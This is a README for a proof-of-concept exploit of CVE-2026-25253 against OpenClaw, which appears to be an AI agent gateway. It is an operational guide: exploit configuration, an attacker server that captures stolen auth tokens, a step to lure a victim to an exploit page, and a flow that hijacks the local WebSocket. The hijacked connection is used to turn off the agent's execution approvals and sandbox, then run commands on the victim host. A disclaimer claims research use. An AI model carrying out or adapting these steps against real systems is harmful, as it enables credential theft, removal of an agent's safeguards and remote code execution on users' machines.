# CVE-2026-25253 Proof of Concept

One-click RCE on OpenClaw via Cross-Site WebSocket Hijacking.

> **DISCLAIMER:** This code is provided for authorized security research and educational purposes only. Use of this code against systems without explicit written permission is illegal and unethical. The author assumes no liability for misuse.

## Blog

Read the [detailed analysis](https://blog.al4n4n.com/2026/02/07/CVE-2026-25253-OpenClaw-One-Click-RCE-Analysis/) for a source-code-level breakdown of this vulnerability and how this PoC was built.

## Prerequisites

- [Node.js](https://nodejs.org/) (v18 or later)
- A running OpenClaw instance with the Gateway on the victim machine (default: `localhost:18789`)
- The victim must have an active auth token stored in their browser (i.e., they have used the Control UI before)

### Install Node.js

**macOS (Homebrew):**

```bash
brew install node
```

**Ubuntu / Debian:**

```bash
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs
```

**Windows:**

Download the installer from https://nodejs.org/ and follow the prompts.

Verify installation:

```bash
node -v
npm -v
```

## Setup

```bash
git clone https://github.com/al4n4n/CVE-2026-25253-research.git
cd CVE-2026-25253-research
npm install
```

This installs the only dependency: `ws` (WebSocket library).

## Configuration

Edit the top of `exploit.html` to match your environment:

```javascript
const LOCAL_SCHEME = 'http';                // Victim's Control UI scheme
const GATEWAY_URL = 'ws://127.0.0.1:18789'; // Victim's local gateway
const ATTACKER_WS_PORT = 8080;              // Attacker WS port (must match attacker-server.js)
const ATTACKER_SCHEME = 'ws';               // Use 'wss' if behind TLS
const COMMAND = 'touch /tmp/success';       // Command to execute on victim host
```

Edit the top of `attacker-server.js` if you need different ports:

```javascript
const HTTP_PORT = 3000;  // Serves exploit.html
const WS_PORT = 8080;    // Captures stolen tokens
```

## Running

### 1. Start the attacker server

```bash
node attacker-server.js
```

You should see:

```
============================================================
CVE-2026-25253 Attack Server
============================================================

[HTTP]  Exploit page: http://0.0.0.0:3000/exploit.html
[WS]    Token capture: ws://0.0.0.0:8080

Waiting for victim...
```

### 2. Lure the victim

Send the victim the following URL (replace `<ATTACKER_IP>` with your IP):

```
http://<ATTACKER_IP>:3000/exploit.html
```

The victim must open this link in a browser where they have previously used the OpenClaw Control UI (so the auth token exists in localStorage).

### 3. What happens

```
┌──────────────────────────────────────────────────────────────────────────┐
│                          EXPLOIT FLOW                                    │
├──────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  1. Victim visits http://<attacker>:3000/exploit.html                    │
│     │                                                                    │
│  2. Page opens popup: http://127.0.0.1:18789?gatewayUrl=ws://<attacker>  │
│     │                                                                    │
│  3. Control UI in popup reads token from localStorage                    │
│     and sends it to attacker's WS server via gatewayUrl                  │
│     │                                                                    │
│  4. Attacker server rejects first connect (device token)                 │
│     Control UI retries with settings token → CAPTURED                    │
│     │                                                                    │
│  5. exploit.html opens its OWN WebSocket to ws://127.0.0.1:18789         │
│     (Cross-Site WebSocket Hijacking - no Origin validation)              │
│     │                                                                    │
│  6. Authenticates with stolen token, disables security:                  │
│     • exec.approvals.set → ask: "off"                                    │
│     • config.patch → host: "gateway", sandbox.mode: "off"                │
│     │                                                                    │
│  7. Sends agent command → RCE on victim host                             │
│                                                                          │
└──────────────────────────────────────────────────────────────────────────┘
```

### 4. Verify

On the victim machine, check if the command was executed:

```bash
ls -la /tmp/success
```

## Files

| File | Description |
|------|-------------|
| `attacker-server.js` | HTTP server (serves exploit page) + WebSocket server (captures stolen tokens) |
| `exploit.html` | Browser-based exploit payload that steals tokens, hijacks WebSocket, disables security, and executes commands |
| `package.json` | Node.js dependencies (`ws`) |